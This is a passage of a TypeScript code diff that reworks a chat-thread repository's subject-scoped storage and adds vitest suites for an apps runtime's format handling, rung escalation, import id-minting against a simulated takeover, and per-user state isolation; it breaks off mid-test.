 }
 
-function isThread(value: unknown): value is Thread {
-  if (typeof value !== "object" || value === null) return false;
-  const candidate = value as Partial<Thread>;
-  return typeof candidate.id === "string"
-    && THREAD_ID_PATTERN.test(candidate.id)
-    && typeof candidate.subject === "string"
-    && Array.isArray(candidate.messages)
-    && typeof candidate.createdAt === "string"
-    && typeof candidate.updatedAt === "string";
+/** Reconstruct a Thread from a store record. The store seam (core §12) carries
+ *  the id + timestamps on the VendoRecord envelope and the reserved
+ *  vendo_threads routing projects `data` down to `{ subject, messages }` (02
+ *  §2) — so the whole Thread is never inside `data`. Read it back from the
+ *  envelope, not from `data`. */
+function threadFromRecord(record: VendoRecord): Thread | null {
+  if (!THREAD_ID_PATTERN.test(record.id)) return null;
+  const data = record.data;
+  if (typeof data !== "object" || data === null) return null;
+  const candidate = data as { subject?: unknown; messages?: unknown };
+  if (typeof candidate.subject !== "string" || !Array.isArray(candidate.messages)) return null;
+  return {
+    id: record.id,
+    subject: candidate.subject,
+    messages: candidate.messages as UIMessage[],
+    createdAt: record.createdAt,
+    updatedAt: record.updatedAt,
+  };
 }
 
 function titleFor(thread: Thread): string {
@@ -49,8 +58,10 @@ function toSummary(thread: Thread): ThreadSummary {
   return { id: thread.id, title: titleFor(thread), updatedAt: thread.updatedAt };
 }
 
-function recordId(subject: string, threadId: ThreadId): string {
-  return `${encodeURIComponent(subject)}:${threadId}`;
+/** Serialize to plain JSON so the value satisfies the store seam's `Json` type
+ *  (drops explicit `undefined`-valued props that JSON.stringify would omit). */
+function toPlainJson(messages: UIMessage[]): UIMessage[] {
+  return JSON.parse(JSON.stringify(messages)) as UIMessage[];
 }
 
 /** 03-agent §5 */
@@ -66,6 +77,19 @@ export class ThreadRepository {
       }
       const existing = await this.get(id, ctx);
       if (existing) return existing;
+      // get() is subject-scoped, so a row owned by ANOTHER subject reads as
+      // null here — but vendo_threads is keyed by the bare id and the store's
+      // upsert would let this turn's persist() take over that row (03 §5:
+      // threads.* never crosses subjects). Ownership-BLIND existence check:
+      // an occupied id is refused, never reused. Skipped on the memory paths
+      // (per-subject maps; ephemeral principals never persist), where no
+      // takeover is possible.
+      if (!this.usesMemory(ctx)) {
+        const occupied = await this.store!.records(THREAD_COLLECTION).get(id);
+        if (occupied !== null) {
+          throw new VendoError("conflict", "threadId is already in use");
+        }
+      }
       return this.create(ctx, id);
     }
     return this.create(ctx);
@@ -76,12 +100,14 @@ export class ThreadRepository {
     if (this.usesMemory(ctx)) {
       return this.subjectMemory(ctx.principal.subject).get(id) ?? null;
     }
-    const record = await this.store!.records(THREAD_COLLECTION)
-      .get(recordId(ctx.principal.subject, id));
-    if (!record || !isThread(record.data) || record.data.subject !== ctx.principal.subject) {
-      return null;
-    }
-    return record.data;
+    // Reserved vendo_threads rows are keyed by the bare thread id (02 §2:
+    // `id` is the thread id). Subject scoping is enforced here, on read, by
+    // checking the row's subject — never returning another subject's thread.
+    const record = await this.store!.records(THREAD_COLLECTION).get(id);
+    if (!record) return null;
+    const thread = threadFromRecord(record);
+    if (!thread || thread.subject !== ctx.principal.subject) return null;
+    return thread;
   }
 
   async list(ctx: RunContext): Promise<ThreadSummary[]> {
@@ -93,8 +119,8 @@ export class ThreadRepository {
         refs: { subject: ctx.principal.subject },
       });
       threads = result.records
-        .map((record) => record.data)
-        .filter((data): data is Thread => isThread(data) && data.subject === ctx.principal.subject);
+        .map(threadFromRecord)
+        .filter((thread): thread is Thread => thread !== null && thread.subject === ctx.principal.subject);
     }
     return threads
       .map(toSummary)
@@ -107,14 +133,22 @@ export class ThreadRepository {
       this.subjectMemory(ctx.principal.subject).delete(id);
       return;
     }
-    await this.store!.records(THREAD_COLLECTION)
-      .delete(recordId(ctx.principal.subject, id));
+    // The bare id is shared across subjects; delete only after confirming the
+    // row belongs to this subject (get() returns null otherwise), so one
+    // subject can never delete another's thread (03 §5).
+    const existing = await this.get(id, ctx);
+    if (existing === null) return;
+    await this.store!.records(THREAD_COLLECTION).delete(id);
   }
 
   async persist(thread: Thread, messages: UIMessage[], ctx: RunContext): Promise<void> {
     const updated: Thread = {
       ...thread,
-      messages,
+      // ai-SDK UIMessages carry explicit `undefined`-valued optional props on
+      // tool parts (e.g. an approval-requested part with no output yet). The
+      // store seam is typed `Json` and rejects `undefined` values, so serialize
+      // to plain JSON — dropping absent-anyway keys — before it crosses.
+      messages: toPlainJson(messages),
       updatedAt: new Date().toISOString(),
     };
     if (this.usesMemory(ctx)) {
@@ -122,7 +156,7 @@ export class ThreadRepository {
       return;
     }
     await this.store!.records(THREAD_COLLECTION).put({
-      id: recordId(updated.subject, updated.id),
+      id: updated.id,
       data: updated,
       refs: { subject: updated.subject },
     });

--- a/packages/agent/src/threads.ts
+++ b/packages/agent/src/threads.ts
@@ -28,6 +28,10 @@ export interface ThreadSummary {
  *  envelope, not from `data`. */
 function threadFromRecord(record: VendoRecord): Thread | null {
   if (!THREAD_ID_PATTERN.test(record.id)) return null;
+  // Timestamps ride the envelope, but a hand-written row (threadStore(store).put
+  // accepts any Json) could still be malformed — validate before trusting them so
+  // one bad row cannot brick the whole listing.
+  if (typeof record.createdAt !== "string" || typeof record.updatedAt !== "string") return null;
   const data = record.data;
   if (typeof data !== "object" || data === null) return null;
   const candidate = data as { subject?: unknown; messages?: unknown };
@@ -42,11 +46,19 @@ function threadFromRecord(record: VendoRecord): Thread | null {
 }
 
 function titleFor(thread: Thread): string {
+  // Messages come from a Json array (parseThreadData accepts any shape), so a
+  // message may lack an iterable `parts` or carry non-text parts — tolerate both,
+  // skipping rather than throwing.
   for (const message of thread.messages) {
-    if (message.role !== "user") continue;
-    for (const part of message.parts) {
-      if (part.type === "text") {
-        const title = part.text.trim();
+    if (message === null || typeof message !== "object") continue;
+    if ((message as { role?: unknown }).role !== "user") continue;
+    const parts = (message as { parts?: unknown }).parts;
+    if (!Array.isArray(parts)) continue;
+    for (const part of parts) {
+      if (part !== null && typeof part === "object"
+        && (part as { type?: unknown }).type === "text"
+        && typeof (part as { text?: unknown }).text === "string") {
+        const title = (part as { text: string }).text.trim();
         return title ? title.slice(0, 80) : "New thread";
       }
     }
@@ -71,28 +83,25 @@ export class ThreadRepository {
   constructor(private readonly store?: StoreAdapter) {}
 
   async resolve(id: ThreadId | undefined, ctx: RunContext): Promise<Thread> {
-    if (id !== undefined) {
-      if (!THREAD_ID_PATTERN.test(id)) {
-        throw new VendoError("validation", "threadId is malformed");
-      }
-      const existing = await this.get(id, ctx);
-      if (existing) return existing;
-      // get() is subject-scoped, so a row owned by ANOTHER subject reads as
-      // null here — but vendo_threads is keyed by the bare id and the store's
-      // upsert would let this turn's persist() take over that row (03 §5:
-      // threads.* never crosses subjects). Ownership-BLIND existence check:
-      // an occupied id is refused, never reused. Skipped on the memory paths
-      // (per-subject maps; ephemeral principals never persist), where no
-      // takeover is possible.
-      if (!this.usesMemory(ctx)) {
-        const occupied = await this.store!.records(THREAD_COLLECTION).get(id);
-        if (occupied !== null) {
-          throw new VendoError("conflict", "threadId is already in use");
-        }
-      }
-      return this.create(ctx, id);
+    if (id === undefined) return this.create(ctx);
+    if (!THREAD_ID_PATTERN.test(id)) {
+      throw new VendoError("validation", "threadId is malformed");
     }
-    return this.create(ctx);
+    // Memory paths (no store / ephemeral) use per-subject maps, so ids are private
+    // and no takeover is possible — resolve straight from this subject's map.
+    if (this.usesMemory(ctx)) {
+      return this.subjectMemory(ctx.principal.subject).get(id) ?? this.create(ctx, id);
+    }
+    // ONE ownership-blind read is the friendly fast-path (03 §5). vendo_threads is
+    // keyed by the bare id, so a foreign row reads as non-null here; reusing the id
+    // would let persist() take it over. Free id → create; ours → return; anyone
+    // else's (or unparseable) → conflict. The store's guarded upsert is the real,
+    // atomic guarantee — this only surfaces the conflict early with a clear error.
+    const record = await this.store!.records(THREAD_COLLECTION).get(id);
+    if (record === null) return this.create(ctx, id);
+    const thread = threadFromRecord(record);
+    if (thread !== null && thread.subject === ctx.principal.subject) return thread;
+    throw new VendoError("conflict", "threadId is already in use");
   }
 
   async get(id: ThreadId, ctx: RunContext): Promise<Thread | null> {
@@ -115,10 +124,20 @@ export class ThreadRepository {
     if (this.usesMemory(ctx)) {
       threads = [...this.subjectMemory(ctx.principal.subject).values()];
     } else {
-      const result = await this.store!.records(THREAD_COLLECTION).list({
-        refs: { subject: ctx.principal.subject },
-      });
-      threads = result.records
+      // Follow the cursor to exhaustion (the store pages at 100) — otherwise a
+      // subject's >100th thread, possibly their most recently active, vanishes
+      // (list orders by created_at, we re-sort by updatedAt below).
+      const records: VendoRecord[] = [];
+      let cursor: string | undefined;
+      do {
+        const result = await this.store!.records(THREAD_COLLECTION).list({
+          refs: { subject: ctx.principal.subject },
+          ...(cursor === undefined ? {} : { cursor }),
+        });
+        records.push(...result.records);
+        cursor = result.cursor;
+      } while (cursor !== undefined);
+      threads = records
         .map(threadFromRecord)
         .filter((thread): thread is Thread => thread !== null && thread.subject === ctx.principal.subject);
     }

--- a/packages/agent/src/wire.test.ts
+++ b/packages/agent/src/wire.test.ts
@@ -1,5 +1,4 @@
 import { vendoViewPartSchema, type ToolDescriptor } from "@vendoai/core";
-import type { UIMessage } from "ai";
 import { describe, expect, it } from "vitest";
 import { createAgent } from "./index.js";
 import {
@@ -10,13 +9,8 @@ import {
   testGuard,
   textTurn,
   toolCallTurn,
+  userMessage,
 } from "./test-helpers.js";
-
-const userMessage = (id: string, text: string): UIMessage => ({
-  id,
-  role: "user",
-  parts: [{ type: "text", text }],
-});
 
 const echoDescriptor: ToolDescriptor = {
   name: "echo",

--- a/packages/apps/src/format-drill.test.ts
+++ b/packages/apps/src/format-drill.test.ts
@@ -1,0 +1,147 @@
+import {
+  VENDO_APP_FORMAT,
+  VENDO_TREE_FORMAT,
+  type AppDocument,
+  type RunContext,
+  type ToolRegistry,
+  type UIPayload,
+} from "@vendoai/core";
+import { describe, expect, it } from "vitest";
+import { createApps } from "./index.js";
+import {
+  bindTools,
+  guardFixture,
+  memoryStore,
+  seedAppRow,
+} from "./testing/index.js";
+
+/**
+ * FORMAT-EVOLUTION FIRE DRILL — the APPS seam (06-apps §1; 01-core §8).
+ *
+ * A throwaway second UI format proves the runtime passes an instant-path payload
+ * through `open()` byte-identical (deep-equal), keyed only on its tag — apps must
+ * not body-sniff payload internals; "the tag owns everything past itself." It
+ * also proves stored records of the OLD (v0 tree) format keep opening unchanged
+ * once a future format exists, and that the `vendo_apps_open` agent-tool path
+ * carries the same surface.
+ *
+ * The drill tag lives ONLY in this test file; it is never a registered format.
+ */
+const DRILL_FORMAT = "vendo/tree@2-drill";
+
+const ctx = (subject = "user_ada"): RunContext => ({
+  principal: { kind: "user", subject },
+  venue: "chat",
+  presence: "present",
+  sessionId: `session_${subject}`,
+});
+
+/** A non-tree drill payload — no root/nodes; a `root` that names nothing so v1
+ *  validation WOULD fail. open() must pass it through, not sniff it. */
+const drillPayload = (): UIPayload => ({
+  formatVersion: DRILL_FORMAT,
+  root: "does-not-exist",
+  blocks: [
+    { heading: "Quarterly revenue", body: "$4,200 across 3 invoices" },
+    { heading: "Next step", body: "Send the reminder" },
+  ],
+});
+
+const drillDoc = (id: string): AppDocument => ({
+  format: VENDO_APP_FORMAT,
+  id,
+  name: "Drill app",
+  tree: drillPayload(),
+});
+
+const v1Doc = (id: string): AppDocument => ({
+  format: VENDO_APP_FORMAT,
+  id,
+  name: "V1 app",
+  tree: {
+    formatVersion: VENDO_TREE_FORMAT,
+    root: "root",
+    nodes: [
+      { id: "root", component: "Stack", children: ["title"] },
+      { id: "title", component: "Text", props: { text: "Instant invoice" } },
+    ],
+    data: { invoice: { total: 4200 } },
+  },
+});
+
+const emptyTools: ToolRegistry = {
+  async descriptors() { return []; },
+  async execute() { return { status: "error", error: { code: "not-found", message: "missing" } }; },
+};
+
+const runtimeWith = () => {
+  const store = memoryStore();
+  const guard = guardFixture();
+  const runtime = createApps({ store, guard, tools: bindTools(guard, emptyTools), catalog: [] });
+  return { store, runtime };
+};
+
+describe("format-evolution fire drill — apps passes the tag through unchanged", () => {
+  it("loads a stored drill-tagged document (validateAppDocument accepts the tag)", async () => {
+    const { store, runtime } = runtimeWith();
+    await seedAppRow(store, drillDoc("app_drill_open"), "user_ada");
+
+    // get() runs the doc back through validateAppDocument on load — no rejection.
+    const loaded = await runtime.get("app_drill_open", ctx());
+    expect(loaded).not.toBeNull();
+    expect(loaded?.tree).toEqual(drillPayload());
+  });
+
+  it("open() returns a tree surface whose payload is byte-identical to the drill payload", async () => {
+    const { store, runtime } = runtimeWith();
+    await seedAppRow(store, drillDoc("app_drill_open2"), "user_ada");
+
+    const surface = await runtime.open("app_drill_open2", ctx());
+    expect(surface.kind).toBe("tree");
+    if (surface.kind !== "tree") throw new Error("expected a tree surface");
+    // Deep-equal, and untouched: no query resolution, no data mutation, blocks intact.
+    expect(surface.payload).toEqual(drillPayload());
+    expect(surface.payload.formatVersion).toBe(DRILL_FORMAT);
+  });
+
+  it("does not body-sniff: an unresolvable v1 shape under the drill tag still opens", async () => {
+    // drillPayload().root names no node — a guaranteed v1 provision failure. If
+    // open() validated it as a tree it would throw; under the tag it is opaque.
+    const { store, runtime } = runtimeWith();
+    await seedAppRow(store, drillDoc("app_drill_opaque"), "user_ada");
+
+    const surface = await runtime.open("app_drill_opaque", ctx());
+    if (surface.kind !== "tree") throw new Error("expected a tree surface");
+    expect(surface.payload).toEqual(drillPayload());
+  });
+
+  it("keeps opening a stored v0 (tree) record identically after the drill format exists", async () => {
+    const { store, runtime } = runtimeWith();
+    // Both formats coexist in the same store, as a live runtime would hold them.
+    await seedAppRow(store, drillDoc("app_drill_coexist"), "user_ada");
+    await seedAppRow(store, v1Doc("app_v1_coexist"), "user_ada");
+
+    const surface = await runtime.open("app_v1_coexist", ctx());
+    if (surface.kind !== "tree") throw new Error("expected a tree surface");
+    expect(surface.payload.formatVersion).toBe(VENDO_TREE_FORMAT);
+    // The v0 record resolves its queries/data exactly as before — stored records stay alive.
+    expect((surface.payload as { root: string }).root).toBe("root");
+    expect((surface.payload as { data?: unknown }).data).toEqual({ invoice: { total: 4200 } });
+  });
+
+  it("carries the drill surface through the vendo_apps_open agent tool path", async () => {
+    const { store, runtime } = runtimeWith();
+    await seedAppRow(store, drillDoc("app_drill_agent"), "user_ada");
+
+    const agentTools = runtime.agentTools();
+    const outcome = await agentTools.execute(
+      { id: "call_open", tool: "vendo_apps_open", args: { appId: "app_drill_agent" } },
+      ctx(),
+    );
+    expect(outcome.status).toBe("ok");
+    if (outcome.status !== "ok") throw new Error("expected ok");
+    const surface = outcome.output as { kind: string; payload: UIPayload };
+    expect(surface.kind).toBe("tree");
+    expect(surface.payload).toEqual(drillPayload());
+  });
+});

--- a/packages/apps/src/ladder.e2e.test.ts
+++ b/packages/apps/src/ladder.e2e.test.ts
@@ -1,0 +1,223 @@
+import {
+  VENDO_APP_FORMAT,
+  type AppDocument,
+  type RunContext,
+  type ToolRegistry,
+} from "@vendoai/core";
+import { describe, expect, it, vi } from "vitest";
+import { createApps, type SandboxAdapter } from "./index.js";
+import {
+  fakeSandbox,
+  guardFixture,
+  memoryStore,
+  scriptedLanguageModel,
+  seedAppRow,
+  type MachineApp,
+  type ScriptedModelCall,
+} from "./testing/index.js";
+
+/**
+ * E2E of the ladder + invisible-graduation invariants (06-apps §2), driven end to
+ * end through the public createApps → AppsRuntime surface against the in-repo core
+ * seam implementations (real StoreAdapter, Guard, and SandboxAdapter — the neighbors
+ * the apps layer is architecturally allowed to compose with) plus a scripted model.
+ * Real side effects are asserted through the store seam (vendo_apps rows, the app
+ * blob namespace) and real HTTP through the fake machine's request path.
+ */
+
+const tools: ToolRegistry = {
+  async descriptors() { return []; },
+  async execute() { return { status: "error", error: { code: "not-found", message: "no tools" } }; },
+};
+
+const ctx = (subject = "user_ada", presence: RunContext["presence"] = "present"): RunContext => ({
+  principal: { kind: "user", subject },
+  venue: "app",
+  presence,
+  sessionId: `session_${subject}`,
+});
+
+const decoder = new TextDecoder();
+
+const promptText = (call: ScriptedModelCall): string =>
+  call.prompt
+    .map((message) => typeof message.content === "string"
+      ? message.content
+      : message.content.map((part) => part.text ?? "").join(""))
+    .join("\n");
+
+const instructionOf = (text: string): string => /INSTRUCTION:\s*(.*)/.exec(text)?.[1] ?? "";
+
+/** A scripted model that drives create → rung-2 → rung-3 escalations by dialect + instruction. */
+const ladderModel = () => scriptedLanguageModel((call) => {
+  const text = promptText(call);
+  if (text.includes("TASK: CREATE_APP")) {
+    return JSON.stringify({
+      name: "Ladder app",
+      description: "climbs the ladder",
+      tree: {
+        formatVersion: "vendo-genui/v1",
+        root: "root",
+        nodes: [{ id: "root", component: "Text", source: "prewired", props: { text: "Rung 1" } }],
+      },
+    });
+  }
+  // TASK: EDIT_CODE — branch on the human instruction (the system prompt itself
+  // always mentions "server-computed", so we must read the INSTRUCTION line only).
+  if (instructionOf(text).includes("computed")) {
+    return JSON.stringify({ rung: 3, files: [{ path: "/app/view.js", content: "export const view = 1;" }] });
+  }
+  return JSON.stringify({ rung: 2, files: [{ path: "/app/server.js", content: "export const server = 1;" }] });
+});
+
+const storedServer = async (
+  store: ReturnType<typeof memoryStore>,
+  appId: string,
+): Promise<string | undefined> => {
+  const record = await store.records("vendo_apps").get(appId);
+  return (record?.data as { doc: AppDocument }).doc.server;
+};
+
+describe("ladder rung transitions (e2e)", () => {
+  it("walks rung 1 → 2 → 3 through edit() while open() always answers from last state", async () => {
+    const store = memoryStore();
+    const sandbox = fakeSandbox();
+    const runtime = createApps({ store, guard: guardFixture(), tools, sandbox, catalog: [], model: ladderModel() });
+    const ada = ctx();
+
+    // Rung 1 — instant, jailed, no machine.
+    const created = await runtime.create({ prompt: "Show a greeting" }, ada);
+    expect(created.ui).toBe("tree");
+    expect(created.server).toBeUndefined();
+    expect(await runtime.open(created.id, ada)).toMatchObject({ kind: "tree", payload: { formatVersion: "vendo-genui/v1" } });
+    expect(await storedServer(store, created.id)).toBeUndefined();
+
+    // Rung 2 — tree + server. UI stays the instant path; a fn: ref now reaches the machine.
+    const toServer = await runtime.edit(created.id, "Add a server backend to persist data", ada);
+    expect(toServer.issues).toBeUndefined();
+    expect(toServer.version.rung).toBe(2);
+    const rung2Server = await storedServer(store, created.id);
+    expect(rung2Server).toMatch(/^fake:snap_/);
+    // open() still answers from last state as a live tree (invisible graduation).
+    expect(await runtime.open(created.id, ada)).toMatchObject({ kind: "tree" });
+    // The machine is genuinely reachable over real HTTP semantics through the proxy path.
+    const fnCall = await runtime.call(created.id, "fn:total", { n: 2 }, ada);
+    expect(fnCall).toMatchObject({ status: "ok", output: { name: "total", args: { n: 2 } } });
+
+    // Rung 3 — server-computed tree. Rendering STAYS on the instant path.
+    const toComputed = await runtime.edit(created.id, "Return a server-computed dashboard tree", ada);
+    expect(toComputed.issues).toBeUndefined();
+    expect(toComputed.version.rung).toBe(3);
+    const rung3Server = await storedServer(store, created.id);
+    expect(rung3Server).toMatch(/^fake:snap_/);
+    expect(rung3Server).not.toBe(rung2Server); // re-snapshotted after the edit
+    expect(await runtime.open(created.id, ada)).toMatchObject({ kind: "tree" });
+
+    // Every transition was recorded in the capped history, newest first.
+    const history = await runtime.history(created.id).list();
+    expect(history.map((entry) => entry.rung)).toEqual([3, 2]);
+  });
+
+  it("opens rung 4 from last state as a cover screenshot, then the live http surface", async () => {
+    const store = memoryStore();
+    const sandbox = fakeSandbox();
+    const seed = await sandbox.create({ env: {} });
+    const server = await seed.snapshot();
+    const runtime = createApps({
+      store,
+      guard: guardFixture(),
+      tools,
+      sandbox,
+      proxyUrl: "https://proxy.test",
+      catalog: [],
+      model: ladderModel(),
+    });
+    const ada = ctx();
+    const app = await runtime.create({ prompt: "Full app" }, ada);
+    await seedAppRow(store, { ...app, ui: "http", server }, ada.principal.subject);
+    // The kept cover (06-apps §1: loading cover = a dimmed screenshot) lives in the app blob namespace.
+    await store.blobs(`app:${app.id}`).put("cover.png", new Uint8Array([137, 80, 78, 71]), { contentType: "image/png" });
+
+    // First open while the snapshot is waking: a non-interactive resuming cover from last state.
+    const resuming = await runtime.open(app.id, ada);
+    expect(resuming.kind).toBe("resuming");
+    if (resuming.kind !== "resuming") throw new Error("expected resuming");
+    expect(resuming.cover).toMatch(/^data:image\/png;base64,/);
+
+    // Once the machine is awake, open() serves the real http surface.
+    await vi.waitFor(() => expect(sandbox.machines.size).toBe(2));
+    await expect(runtime.open(app.id, ada)).resolves.toEqual({
+      kind: "http",
+      url: expect.stringContaining("fake-machine"),
+    });
+  });
+
+  it("keeps the previous rung serving when the next rung fails to build", async () => {
+    const serveV1: MachineApp = (request) => request.path === "/fn/version"
+      ? { status: 200, headers: { "content-type": "application/json" }, body: JSON.stringify({ result: "v1" }) }
+      : { status: 404, headers: { "content-type": "application/json" }, body: JSON.stringify({ error: { code: "x", message: "no" } }) };
+    const base = fakeSandbox({ app: serveV1 });
+    const seed = await base.create({ env: {} });
+    const server = await seed.snapshot();
+    // Every resumed machine fails `node --check`, so the escalation's fork edit cannot
+    // snapshot — but the already-live serving machine never execs, so it keeps serving v1.
+    const failingBuild: SandboxAdapter = {
+      create: (spec) => base.create(spec),
+      async resume(ref) {
+        const machine = await base.resume(ref);
+        machine.programExec({ code: 1, stdout: "", stderr: "SyntaxError: unexpected token" });
+        return machine;
+      },
+    };
+    const store = memoryStore();
+    // A rung-2 app: the instant-path tree AND a live server.
+    const app: AppDocument = {
+      format: VENDO_APP_FORMAT,
+      id: "app_serving",
+      name: "Serving",
+      ui: "tree",
+      tree: {
+        formatVersion: "vendo-genui/v1",
+        root: "root",
+        nodes: [{ id: "root", component: "Text", source: "prewired", props: { text: "Serving" } }],
+      },
+      server,
+    };
+    await seedAppRow(store, app, "user_ada");
+    const runtime = createApps({
+      store,
+      guard: guardFixture(),
+      tools,
+      sandbox: failingBuild,
+      catalog: [],
+      model: scriptedLanguageModel(JSON.stringify({ rung: 2, files: [{ path: "/app/server.js", content: "broken(" }] })),
+    });
+    const ada = ctx();
+
+    // The previous rung (v1) is live and serving.
+    await expect(runtime.call(app.id, "fn:version", {}, ada)).resolves.toEqual({ status: "ok", output: "v1" });
+
+    // The escalation fails to build — edit surfaces issues and never mutates the document.
+    const failed = await runtime.edit(app.id, "Add a server that fails to compile", ada);
+    expect(failed.issues?.length).toBeGreaterThan(0);
+    expect(await storedServer(store, app.id)).toBe(server); // server ref unchanged
+
+    // The old rung is STILL serving v1 (never swapped to a half-built machine).
+    await expect(runtime.call(app.id, "fn:version", {}, ada)).resolves.toEqual({ status: "ok", output: "v1" });
+    await expect(runtime.open(app.id, ada)).resolves.not.toMatchObject({ kind: "resuming" });
+  });
+
+  it("refuses to graduate a tree app straight to rung 4 in v0 (documented boundary)", async () => {
+    const store = memoryStore();
+    const sandbox = fakeSandbox();
+    const runtime = createApps({ store, guard: guardFixture(), tools, sandbox, catalog: [], model: ladderModel() });
+    const ada = ctx();
+    const app = await runtime.create({ prompt: "A tree app" }, ada);
+
+    const result = await runtime.edit(app.id, "Turn this into a full web app", ada);
+
+    // ui:"http" is never a prerequisite (06-apps §2): the engine blocks the tree→http jump.
+    expect(result.issues?.some((issue) => issue.includes("cannot graduate a tree app to rung 4"))).toBe(true);
+    expect((await runtime.get(app.id, ada))?.ui).toBe("tree"); // document untouched
+  });
+});

--- a/packages/apps/src/runtime.e2e.test.ts
+++ b/packages/apps/src/runtime.e2e.test.ts
@@ -1,0 +1,212 @@
+import {
+  VENDO_APP_FORMAT,
+  type AppDocument,
+  type RunContext,
+  type ToolDescriptor,
+  type ToolRegistry,
+} from "@vendoai/core";
+import { zipSync } from "fflate";
+import { describe, expect, it, vi } from "vitest";
+import { createApps } from "./index.js";
+import {
+  basicLanguageModel,
+  bindTools,
+  fakeSandbox,
+  guardFixture,
+  memoryStore,
+  seedAppRow,
+} from "./testing/index.js";
+
+/**
+ * E2E of ownership/interchange authority (06-apps §7, 01-core §10), the state
+ * singleton (06-apps §6), and the tool-proxy capability axis (06-apps §4.4),
+ * exercised through the public createApps surface. Real neighbors are the in-repo
+ * core seam implementations (the layer apps may compose with); persisted side
+ * effects are asserted through the store seam (vendo_apps + vendo_state rows).
+ */
+
+const ctx = (subject: string, presence: RunContext["presence"] = "present"): RunContext => ({
+  principal: { kind: "user", subject },
+  venue: "app",
+  presence,
+  sessionId: `session_${subject}`,
+});
+
+const encoder = new TextEncoder();
+const json = async (response: Response): Promise<unknown> => response.json() as Promise<unknown>;
+
+const treeApp = (id: string, name: string): AppDocument => ({
+  format: VENDO_APP_FORMAT,
+  id,
+  name,
+  ui: "tree",
+  tree: {
+    formatVersion: "vendo-genui/v1",
+    root: "root",
+    nodes: [{ id: "root", component: "Text", source: "prewired", props: { text: name } }],
+  },
+});
+
+const inertTools: ToolRegistry = {
+  async descriptors() { return []; },
+  async execute() { return { status: "error", error: { code: "not-found", message: "no tools" } }; },
+};
+
+describe("interchange authority (e2e)", () => {
+  it("mints a fresh id for a doctored artifact claiming a victim's app id (no takeover)", async () => {
+    const store = memoryStore();
+    const runtime = createApps({ store, guard: guardFixture(), tools: inertTools, catalog: [] });
+
+    // The victim owns app_victim.
+    const victim = treeApp("app_victim", "Victim App");
+    await seedAppRow(store, victim, "user_victim", true);
+
+    // An attacker imports an artifact whose embedded id claims the victim's app.
+    const doctored = treeApp("app_victim", "Attacker Payload");
+    const imported = await runtime.importApp(doctored, ctx("user_attacker"));
+
+    // The claimed id is never trusted: a fresh id is minted and the copy belongs to the attacker.
+    expect(imported.id).not.toBe("app_victim");
+    expect(imported.id).toMatch(/^app_/);
+    expect(imported.name).toBe("Attacker Payload");
+
+    // The victim's row is byte-for-byte intact and still owned by the victim.
+    const victimRow = await store.records("vendo_apps").get("app_victim");
+    expect((victimRow?.data as { subject: string }).subject).toBe("user_victim");
+    expect((victimRow?.data as { doc: AppDocument }).doc).toEqual(victim);
+    expect(await runtime.get("app_victim", ctx("user_victim"))).toEqual(victim);
+
+    // The attacker cannot reach the victim's app at all (cross-subject → not found).
+    expect(await runtime.get("app_victim", ctx("user_attacker"))).toBeNull();
+  });
+
+  it("mints a fresh id for a doctored .vendoapp archive claiming a victim's app id", async () => {
+    const store = memoryStore();
+    const runtime = createApps({ store, guard: guardFixture(), tools: inertTools, catalog: [] });
+    await seedAppRow(store, treeApp("app_target", "Target"), "user_target", true);
+
+    // A hand-built archive whose app.json even carries the victim id inside the document body.
+    const archive = zipSync({
+      "app.json": encoder.encode(JSON.stringify({ ...treeApp("app_target", "Smuggled"), id: "app_target" })),
+    });
+    const imported = await runtime.importApp(archive, ctx("user_attacker"));
+
+    expect(imported.id).not.toBe("app_target");
+    expect(await runtime.get("app_target", ctx("user_attacker"))).toBeNull();
+    expect((await runtime.get("app_target", ctx("user_target")))?.name).toBe("Target");
+  });
+});
+
+describe("state singleton isolation (e2e)", () => {
+  const openHttp = async (
+    runtime: ReturnType<typeof createApps>,
+    store: ReturnType<typeof memoryStore>,
+    sandbox: ReturnType<typeof fakeSandbox>,
+    subject: string,
+  ): Promise<{ appId: string; token: string }> => {
+    const app = treeApp(`app_${subject}`, subject);
+    await seedAppRow(store, { ...app, ui: "http" }, subject);
+    const before = sandbox.machines.size;
+    await runtime.open(app.id, ctx(subject));
+    await vi.waitFor(() => expect(sandbox.machines.size).toBe(before + 1));
+    const machine = [...sandbox.machines.values()].at(-1)!;
+    return { appId: app.id, token: machine.env.VENDO_RUN_TOKEN as string };
+  };
+
+  it("keeps per-user-per-app state fully isolated through the $state proxy hook", async () => {
+    const store = memoryStore();
+    const sandbox = fakeSandbox();
+    const runtime = createApps({
+      store,
+      guard: guardFixture(),
+      tools: inertTools,
+      sandbox,
+      proxyUrl: "https://proxy.test",
+      catalog: [],
+      model: basicLanguageModel(),
+    });
+
+    const ada = await openHttp(runtime, store, sandbox, "user_ada");
+    const grace = await openHttp(runtime, store, sandbox, "user_grace");
+
+    const put = (token: string, body: unknown) => runtime.proxy.handler(new Request("https://proxy.test/state", {
+      method: "PUT",
+      headers: { authorization: `Bearer ${token}`, "content-type": "application/json" },
+      body: JSON.stringify(body),
+    }));
+    const get = (token: string) => runtime.proxy.handler(new Request("https://proxy.test/state", {
+      headers: { authorization: `Bearer ${token}` },
+    }));
+
+    expect((await put(ada.token, { owner: "ada" })).status).toBe(200);
+    expect((await put(grace.token, { owner: "grace" })).status).toBe(200);
+
+    // Each principal's $state singleton is its own row, keyed (appId, subject).
+    expect(await json(await get(ada.token))).toEqual({ owner: "ada" });
+    expect(await json(await get(grace.token))).toEqual({ owner: "grace" });
+    expect(await store.records("vendo_state").get(`${ada.appId}:user_ada`)).toMatchObject({ data: { owner: "ada" } });
+    expect(await store.records("vendo_state").get(`${grace.appId}:user_grace`)).toMatchObject({ data: { owner: "grace" } });
+
+    // A foreign subject's row on the SAME app id never leaks back to the owner's read.
+    await store.records("vendo_state").put({
+      id: `${ada.appId}:user_intruder`,
+      data: { owner: "intruder" },
+      refs: { subject: "user_intruder", app_id: ada.appId },
+    });
+    expect(await json(await get(ada.token))).toEqual({ owner: "ada" });
+  });
+});
+
+describe("tool proxy authority (e2e)", () => {
+  it("scopes the run token to away presence and reaches only the guard-bound registry", async () => {
+    const descriptors: ToolDescriptor[] = [
+      { name: "host_read", description: "Read", inputSchema: { type: "object" }, risk: "read" },
+      { name: "host_park", description: "Needs approval", inputSchema: { type: "object" }, risk: "write" },
+      { name: "host_forbidden", description: "Blocked", inputSchema: { type: "object" }, risk: "destructive" },
+    ];
+    const rawTools: ToolRegistry = {
+      async descriptors() { return descriptors; },
+      async execute(call, runCtx) { return { status: "ok", output: { tool: call.tool, presence: runCtx.presence, appId: runCtx.appId } }; },
+    };
